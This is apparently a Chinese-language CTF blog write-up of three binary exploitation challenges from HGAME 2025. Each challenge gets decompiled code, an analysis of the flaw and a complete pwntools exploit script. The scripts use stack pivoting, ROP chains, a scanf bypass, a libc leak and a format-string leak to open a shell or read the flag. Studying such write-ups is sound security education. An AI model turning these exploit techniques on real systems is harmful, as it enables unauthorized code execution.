---
title: 2025 HGAMECTF
date: 2025-02-11 01:32:40 +0800
categories:
  - ctf比赛
tags:
  - ctf
permalink: /posts/id=102/
pin: false
published:
---
## ezstack
```shell
[*] '/mnt/hgfs/ctf/2025hgame/ezstack/vuln'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```

### 漏洞分析
主逻辑是建立了一个socket连接，客户端连接成功后返回一个文件描述符，传入handler

```c
int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
  socklen_t addr_len; // [rsp+Ch] [rbp-44h] BYREF
  sockaddr addr; // [rsp+10h] [rbp-40h] BYREF
  int optval; // [rsp+2Ch] [rbp-24h] BYREF
  struct sockaddr s; // [rsp+30h] [rbp-20h] BYREF
  __pid_t v7; // [rsp+44h] [rbp-Ch]
  int v8; // [rsp+48h] [rbp-8h]
  int fd; // [rsp+4Ch] [rbp-4h]

  signal(17, 1);
  fd = socket(2, 1, 6);
  if ( fd < 0 )
  {
    perror("socket error");
    exit(1);
  }
  memset(&s, 0, sizeof(s));
  s.sa_family = 2;
  *s.sa_data = htons(0x270Fu);
  *&s.sa_data[2] = htonl(0);
  optval = 1;
  if ( setsockopt(fd, 1, 2, &optval, 4u) < 0 )
  {
    perror("setsockopt error");
    exit(1);
  }
  if ( bind(fd, &s, 0x10u) < 0 )
  {
    perror("bind error");
    exit(1);
  }
  if ( listen(fd, 10) < 0 )
  {
    perror("listen error");
    exit(1);
  }
  addr_len = 16;
  while ( 1 )
  {
    v8 = accept(fd, &addr, &addr_len);
    if ( v8 < 0 )
      break;
    v7 = fork();
    if ( v7 == -1 )
    {
      perror("fork error");
      exit(1);
    }
    if ( !v7 )
    {
      handler(v8);
      close(v8);
      exit(0);
    }
    close(v8);
  }
  perror("accept error");
  exit(1);
}
```

在handler中开启了沙箱，黑名单execve，然后用文件描述符作为rdi执行read，存在一个8字节的溢出

```c
__int64 __fastcall handler(unsigned int a1)
{
  __int64 v2; // [rsp+18h] [rbp-8h]

  v2 = seccomp_init(2147418112LL);
  seccomp_rule_add(v2, 0LL, 59LL, 0LL);
  seccomp_rule_add(v2, 0LL, 322LL, 0LL);
  seccomp_load(v2);
  print(a1, "Some gossip about Vidar here.\n");
  print(a1, "But you'd have to break my vulnerability to tell you.\n");
  print(a1, &unk_4020C7);
  print(a1, "Are you ready?Let's go!\n");
  vuln(a1);
  print(a1, &unk_4020F6);
  return 0LL;
}

ssize_t __fastcall vuln(unsigned int a1)
{
  _BYTE buf[80]; // [rsp+10h] [rbp-50h] BYREF

  print(a1, &unk_402018);
  print(a1, "That's all.\n");
  print(a1, "Good luck.\n");
  return read(a1, buf, 0x60uLL);
}
```

由于二进制文件本身既是客户端又是服务端，这里调试可以用docker跑服务端，然后调试其中的vuln进程即可

```shell
sudo gdb -p  `pidof /vuln`
```

### 利用思路

由于read的rdi参数并非0，这里要利用read构建栈迁移就需要设置fd为4，才能正常的读入数据

```
.text:000000000040140F                 lea     rcx, [rbp+buf]
.text:0000000000401413                 mov     eax, [rbp+fd]
.text:0000000000401416                 mov     edx, 60h ; '`'  ; nbytes
.text:000000000040141B                 mov     rsi, rcx        ; buf
.text:000000000040141E                 mov     edi, eax        ; fd
.text:0000000000401420                 call    _read
.text:0000000000401425                 nop
.text:0000000000401426                 leave
.text:0000000000401427                 retn
```

data段上有一个gift变量存放了一些数字，所以劫持rbp使得read的rdi参数为4，然后栈迁移输出libc地址后回到vuln函数，再次构造栈迁移，利用leaveret跳转执行rop链

exp:
```python
# _*_ coding:utf-8 _*_
from pwn import *
import re
import os, struct, random, time, sys, signal
import hashlib
from hashlib import sha256
import socket

p = remote("node1.hgame.vidar.club","30142") # typ="udp"
# p = process("./vuln.patch")
elf = ELF("./vuln")
libc = elf.libc

context.log_level = "debug" # info
context.arch = elf.arch
context.terminal = ['tmux', 'splitw', '-hp','64']

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data).encode())
sa      = lambda text,data          :p.sendafter(text, str(data).encode())
sl      = lambda data               :p.sendline(str(data).encode())
sla     = lambda text,data          :p.sendlineafter(text, str(data).encode())
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
ia      = lambda                    :p.interactive()
hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
l32     = lambda                    :u32(p.recvuntil(b"\xf7")[-4:].ljust(4,b"\x00"))
l64     = lambda                    :u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
uu32    = lambda                    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda                    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data               :int(data,16)
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
# sc      = lambda                    :shellcraft.amd64.linux.sh()
#-----------------------------------------------------------------------------------------
def dbg(breakpoint=''):
    elf_base = int(os.popen('pmap {}| awk \x27{{print \x241}}\x27'.format(p.pid)).readlines()[1], 16) if elf.pie else 0
    script = 'b *{:#x}\n'.format(int(breakpoint) + elf_base) if isinstance(breakpoint, int) else breakpoint
    gdb.attach(p,script)
    pause()


leave_ret = 0x00000000004013cb
bss = 0x404100
read = 0x40140F
pop_rdi = 0x0000000000401713
pop_rsi_r15 = 0x0000000000401711
main = 0x4013CD
write_got = 0x404030
ret = 0x000000000040101a

write_plt = elf.plt['write']
read_plt = elf.plt['read']
lg("write_plt")

ru(b"Good luck.\n")
p.send(b'a'*0x50+p64(bss+0x54)+p64(read))

pay = p32(0)+p64(pop_rdi)+p64(4)+p64(pop_rsi_r15)+p64(write_got)+p64(0)+p64(write_plt)+p64(main)+p32(4)*4
p.send(pay.ljust(0x50,b'a')+p64(bss)+p64(leave_ret))


libc_base = l64()-1106560
lg("libc_base")
pop_rsi = libc_base + 0x000000000002601f
pop_rdx_r12 = libc_base + 0x0000000000119431
Open = libc_base+libc.sym['open']
Read = libc_base+libc.sym['read']
Write = libc_base+libc.sym['write']
mprotect = libc_base + libc.sym['mprotect']
syscall = libc_base + 0x00000000000630a9
pop_rax = libc_base +0x0000000000036174
jmp_rsp = libc_base + 0x0000000000131afd
pop_rbp = 0x000000000040135d

pay = p64(pop_rdi)+p64(5)+p64(pop_rdx_r12)+p64(0x30)+p64(0)+p64(Read)+p64(pop_rdi)+p64(4)+p64(Write)
p.send(pay.ljust(0x50,b'a')+p64(bss+0xa0)+p64(read))

p.send(p32(4)*20 + p64(bss+0xa0+0x50) + p64(read))

flag = 0x4041a0
pay = b"/flag\x00".ljust(8,b'\x00')+p64(pop_rdi)+p64(flag)+p64(pop_rsi)+p64(0)+p64(pop_rdx_r12)+p64(0)*2+p64(Open)
pay += p64(pop_rbp)+p64(bss-0x20)+p64(leave_ret)
# pause()
p.send(pay)

ia()
```

## counting petals
```shell
[*] '/mnt/hgfs/ctf/2025hgame/counting petals/vuln'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    RUNPATH:  b'/home/ef4tless/glibc-all-in-one/libs/2.35-0ubuntu3.8_amd64/'
```

### 漏洞分析

通过scanf往栈上输入内容，存在利用"+"进行绕过的漏洞
同时flowers数量这个变量也存放在栈上，可以进行覆盖，实现任意栈地址写

```c
int __fastcall main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+Ch] [rbp-A4h]
  int v5; // [rsp+10h] [rbp-A0h]
  int v6; // [rsp+14h] [rbp-9Ch]
  _QWORD v7[17]; // [rsp+18h] [rbp-98h] BYREF
  int v8; // [rsp+A0h] [rbp-10h] BYREF
  int v9; // [rsp+A4h] [rbp-Ch]
  unsigned __int64 v10; // [rsp+A8h] [rbp-8h]

  v10 = __readfsqword(0x28u);
  init(argc, argv, envp);
  v4 = 0;
  while ( 1 )
  {
    v5 = 0;
    v6 = rand() % 30;
    v9 = 0;
    puts("\nAs we know,there's a tradition to determine whether someone loves you or not...");
    puts("... by counting flower petals when u are not sure.");
    puts("\nHow many flowers have you prepared this time?");
    __isoc99_scanf("%d", &v8);
    if ( v8 > 16 )
    {
      puts("\nNo matter how many flowers there are, they cannot change the fact of whether he or she loves you.");
      puts("Just a few flowers will reveal the answer,love fool.");
      exit(0);
    }
    puts("\nTell me the number of petals in each flower.");
    while ( v9 < v8 )
    {
      printf("the flower number %d : ", ++v9);
      __isoc99_scanf("%ld", &v7[v9 + 1]);
    }
    puts("\nDo you want to start with 'love me'");
    puts("...or 'not love me'?");
    puts("Reply 1 indicates the former and 2 indicates the latter: ");
    __isoc99_scanf("%ld", v7);
    puts("\nSometimes timing is important, so I added a little bit of randomness.");
    puts("\nLet's look at the results.");
    while ( v5 < v8 )
    {
      printf("%ld + ", v7[++v5 + 1]);
      v7[0] += v7[v5 + 1];
    }
    printf("%d", v6);
    v7[0] += v6;
    puts(" = ");
    if ( (v7[0] & 1) == 0 )
      break;
    puts("He or she doesn't love you.");
    if ( v4 > 0 )
      return 0;
    ++v4;
    puts("What a pity!");
    puts("I can give you just ONE more chance.");
    puts("Wish that this time they love you.");
  }
  puts("Congratulations,he or she loves you.");
  return 0;
}
```


### 利用思路
通过“+”跳过覆盖栈上的内容，结合后面会用printf输出栈上的内容，可以泄露libc地址
然后修改掉栈上的flower数量，就能覆写返回地址，执行rop链

exp:

```python
# _*_ coding:utf-8 _*_
from pwn import *
import re
import os, struct, random, time, sys, signal
import hashlib
from hashlib import sha256

p = remote("node2.hgame.vidar.club",32477) #typ="udp"
# p = process("./vuln")
elf = ELF("./vuln")
libc = elf.libc

context.log_level = "debug" # info
context.arch = elf.arch
context.terminal = ['tmux', 'splitw', '-hp','64']

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data).encode())
sa      = lambda text,data          :p.sendafter(text, str(data).encode())
sl      = lambda data               :p.sendline(str(data).encode())
sla     = lambda text,data          :p.sendlineafter(text, str(data).encode())
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
ia      = lambda                    :p.interactive()
hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
l32     = lambda                    :u32(p.recvuntil(b"\xf7")[-4:].ljust(4,b"\x00"))
l64     = lambda                    :u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
uu32    = lambda                    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda                    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data               :int(data,16)
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
# sc      = lambda                    :shellcraft.amd64.linux.sh()
#-----------------------------------------------------------------------------------------
def dbg(breakpoint=''):
    elf_base = int(os.popen('pmap {}| awk \x27{{print \x241}}\x27'.format(p.pid)).readlines()[1], 16) if elf.pie else 0
    script = 'b *{:#x}\n'.format(int(breakpoint) + elf_base) if isinstance(breakpoint, int) else breakpoint
    gdb.attach(p,script)
    pause()


ru(b"How many flowers have you prepared this time?")
sl(16)

for i in range(15):
    sla(b": ",'+')

sla(b": ", 0x1000000013)
sla(b": ",'+')
sla(b": ",'+')
sla(b": ",'+')
sla(b"Reply 1 indicates the former and 2 indicates the latter: \n",1)
ru(b"1 + ")

libc_base = int(ru(b" +")[0:-2],10)-0x029d90
lg("libc_base")
system_addr = libc_base + libc.sym["system"]
bin_sh = libc_base + next(libc.search(b"/bin/sh\x00"))
pop_rdi = libc_base + 0x000000000002a3e5
ret = libc_base + 0x0000000000029139

ru(b"How many flowers have you prepared this time?")
sl(16)

for i in range(15):
    sla(b": ",'+')

sla(b": ",0x1200000016)

sla(b": ",ret)
sla(b": ",pop_rdi)
sla(b": ",bin_sh)
sla(b": ",system_addr)
sla("Reply 1 indicates the former and 2 indicates the latter: \n",1)

ia()
```

## format
```shell
[*] '/mnt/hgfs/ctf/2025hgame/format/vuln'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x3ff000)
    RUNPATH:  b'/home/ef4tless/glibc-all-in-one/libs/2.35-0ubuntu3.8_amd64/'
```
### 漏洞分析
size是int类型，可以输入负数，使得后面的read函数可以输入任意大小的内容，造成栈溢出
会执行一个格式化字符串漏洞的printf函数，但是限制了format变量的输入，只能输入3个字符

```c
int __fastcall main(int argc, const char **argv, const char **envp)
{
  char format[4]; // [rsp+0h] [rbp-10h] BYREF
  int size; // [rsp+4h] [rbp-Ch] BYREF
  int v6; // [rsp+8h] [rbp-8h] BYREF
  int i; // [rsp+Ch] [rbp-4h]

  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  printf("you have n chance to getshell\n n = ");
  if ( __isoc99_scanf("%d", &v6) <= 0 )
    exit(1);
  for ( i = 0; i < v6; ++i )
  {
    printf("type something:");
    if ( __isoc99_scanf("%3s", format) <= 0 )
      exit(1);
    printf("you type: ");
    printf(format);
  }
  printf("you have n space to getshell(n<5)\n n = ");
  __isoc99_scanf("%d\n", &size);
  if ( size <= 5 )
    vuln(size);
  return 0;
}

ssize_t __fastcall vuln(unsigned int a1)
{
  _BYTE buf[4]; // [rsp+1Ch] [rbp-4h] BYREF

  printf("type something:");
  return read(0, buf, a1);
}
```

### 利用思路
利用第一次格式化字符串泄露栈地址，再栈溢出回到格式化字符串，进一步泄露libc地址，然后直接控制返回地址执行rop链即可


exp:
```python
# _*_ coding:utf-8 _*_
from pwn import *
import re
import os, struct, random, time, sys, signal
import hashlib
from hashlib import sha256

p = remote("node1.hgame.vidar.club","32459") #typ="udp"
# p = process("./vuln")
elf = ELF("./vuln")
libc = elf.libc

context.log_level = "debug" # info
context.arch = elf.arch
context.terminal = ['tmux', 'splitw', '-hp','64']

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data).encode())
sa      = lambda text,data          :p.sendafter(text, str(data).encode())
sl      = lambda data               :p.sendline(str(data).encode())
sla     = lambda text,data          :p.sendlineafter(text, str(data).encode())
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
ia      = lambda                    :p.interactive()
hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
l32     = lambda                    :u32(p.recvuntil(b"\xf7")[-4:].ljust(4,b"\x00"))
l64     = lambda                    :u64(p.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
uu32    = lambda                    :u32(p.recv(4).ljust(4,b'\x00'))
uu64    = lambda                    :u64(p.recv(6).ljust(8,b'\x00'))
int16   = lambda data               :int(data,16)
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
# sc      = lambda                    :shellcraft.amd64.linux.sh()
#-----------------------------------------------------------------------------------------
def dbg(breakpoint=''):
    elf_base = int(os.popen('pmap {}| awk \x27{{print \x241}}\x27'.format(p.pid)).readlines()[1], 16) if elf.pie else 0
    script = 'b *{:#x}\n'.format(int(breakpoint) + elf_base) if isinstance(breakpoint, int) else breakpoint
    gdb.attach(p,script)
    pause()

read = 0x4011DC 
leave_ret = 0x00000000004011ee
bss = 0x404100
pop_rdi = 0
printf = 0x4012CF

sla(b"n =",1)
sla(b"type something:",'%p')
ru(b"0x")
stack = int16(ru(b"y")[:-1])
lg("stack")
fmt = stack + 0x002130

ru(b"n = ")
p.send(b"-1\x00")
pay = b'a'*0x4+p64(fmt)+p64(0x4012CF)+b"%p"*0x3
# dbg(0x4011E8)
p.send(pay)


ru(b"0xffffffff0x")
libc_base = int16(ru(b"\xff")[:-1])-0x1147e2
lg("libc_base")
pop_rdi = libc_base + 0x000000000002a3e5
system_addr = libc_base + libc.sym["system"]
bin_sh = libc_base + next(libc.search(b"/bin/sh\x00"))
ret = libc_base + 0x0000000000029139
pop_rsi = libc_base +0x000000000002be51
pop_rdx = libc_base + 0x000000000011f2e7


pay = b'a'*0x4+p64(stack-0x2118)+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(pop_rsi)+p64(0)+p64(system_addr)
p.send(pay)

ia()
```
